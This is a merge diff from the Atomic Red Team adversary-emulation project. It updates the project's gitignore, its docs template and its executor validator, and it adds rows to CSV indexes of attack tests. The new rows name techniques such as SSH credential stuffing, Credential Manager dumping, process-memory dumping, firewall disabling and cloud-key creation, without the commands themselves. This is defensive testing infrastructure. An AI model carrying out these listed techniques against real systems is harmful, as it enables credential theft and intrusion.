Merge branch 'master' into pr-passwordspraying-azure

.gitignore

@@ -24,3 +24,6 @@ docs/.sass-cache/
 docs/_site/
 **/Invoke-AtomicTest-ExecutionLog.csv
 techniques_hash.db
+
+# Credential files 
+*.creds

README.md

@@ -34,7 +34,7 @@ See: https://atomicredteam.io
 
 ## Having trouble?
 
-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
+Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link))
 
 ## Getting Started
 

atomic_red_team/atomic_doc_template.md.erb

@@ -25,13 +25,17 @@
   end
 end.join(', ') %>
 
+
+**auto_generated_guid:** <%= test['auto_generated_guid'] %>
+
+
 <%def cleanup(input)
     input.to_s.strip.gsub(/\\/,"&#92;")
 end%>
 
 <% if test['input_arguments'].to_a.count > 0 %>
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 <% test['input_arguments'].each do |arg_name, arg_options| -%>
 | <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -75,7 +79,7 @@ end%>
 ##### Description: <%= dep['description'].strip  %>
 ##### Check Prereq Commands:
 ```<%= get_language(dependency_executor) %>
-<%= dep['prereq_command'].strip %> 
+<%= dep['prereq_command'].strip %>
 ```
 ##### Get Prereq Commands:
 ```<%= get_language(dependency_executor) %>

atomic_red_team/atomic_red_team.rb

@@ -142,7 +142,7 @@ class AtomicRedTeam
       raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
       raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
   
-      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud']
+      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
       case executor['name']
         when 'manual'
           raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
                                          string: executor['steps'],
                                          string_description: "atomic_tests[#{i}].executor.steps"
 
-        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud'
+        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
           raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
           raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
 

atomic_red_team/spec.yaml

@@ -115,7 +115,7 @@ atomic_tests:
   # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
   # per test, but there are cases where you may have multiple - for example, separate executors for `sh`
   # and `bash` when working on linux OSes.
-  # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`.
+  # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
   executors:
   # the name of the executor describes the framework or application in which the test should be executed.
   #

atomics/Indexes/Indexes-CSV/index.csv

@@ -5,12 +5,16 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
@@ -62,6 +66,8 @@ credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -192,6 +198,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
@@ -265,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -318,7 +326,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -353,9 +361,12 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -481,6 +492,8 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -499,6 +512,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
 persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -565,6 +579,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364
 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
@@ -587,6 +602,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
 impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
 impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -788,6 +804,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
@@ -815,6 +832,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -836,6 +854,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
@@ -11,6 +12,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
 collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -42,6 +45,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -87,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
@@ -146,10 +151,13 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
@@ -164,6 +172,7 @@ persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3
 persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
 persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
@@ -174,6 +183,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83
 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
 command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
